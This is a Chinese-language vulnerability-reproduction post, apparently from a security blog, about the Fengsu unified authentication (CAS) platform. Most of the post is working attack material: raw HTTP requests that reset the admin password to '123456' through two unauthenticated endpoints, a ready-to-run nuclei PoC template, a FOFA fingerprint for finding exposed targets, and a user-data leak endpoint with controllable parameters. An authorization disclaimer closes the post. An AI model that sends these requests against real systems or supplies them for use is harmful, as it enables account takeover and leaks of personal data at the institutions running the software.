前言
一天,日常浏览公众号文章,看到一个【漏洞复现】
这一套21或22年打过的一套,简单分析一下。
统一任意重置
指纹:body=”/cas/themes/zbvc/js/jquery.min.js”
报文如下:
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: 127.0.0.1
Content-Length: 46
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Application-Name: cas
Content-Type: application/json;charset=UTF-8
Connection: close
{"xgh":"admin","newPass":"123456","email":""}
Poc:
id: Cas-Fengsu-template-resetPasswordBySuper
info:
name: 风速统一resetPasswordBySuper任意重置
author: xxx
severity: info
description: description
reference:
- https://
metadata:
fofa-query: body="/cas/themes/zbvc/js/jquery.min.js"
tags: tags
http:
- raw:
- |
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: {{Hostname}}
Content-Length: 47
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Application-Name: cas
Content-Type: application/json;charset=UTF-8
Connection: close
{"xgh":"admin","newPass":"123456","email":""}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '密码修改成功'
- type: status
status:
- 200
验证demo:
老接口重置2:
POST /cas/userCtl/resetPassword HTTP/1.1
Host: 127.0.0.1
Content-Length: 46
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Application-Name: cas
Content-Type: application/json;charset=UTF-8
Connection: close
{"xgh":"admin","newPass":"123456","email":""}
验证
重置功能点:
统一用户管理平台:用户中心
请求接口:cas/manager/user.html
重置接口:cas/userCtl/resetPasswordBySuper
最新版统一已修复上述任意重置接口
统一敏感泄露接口:cas/userCtl/getPage?name=&page=1&size=10【name可控、size可控】
demo:/cas/userCtl/getPage?name=admin&page=1&size=10
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。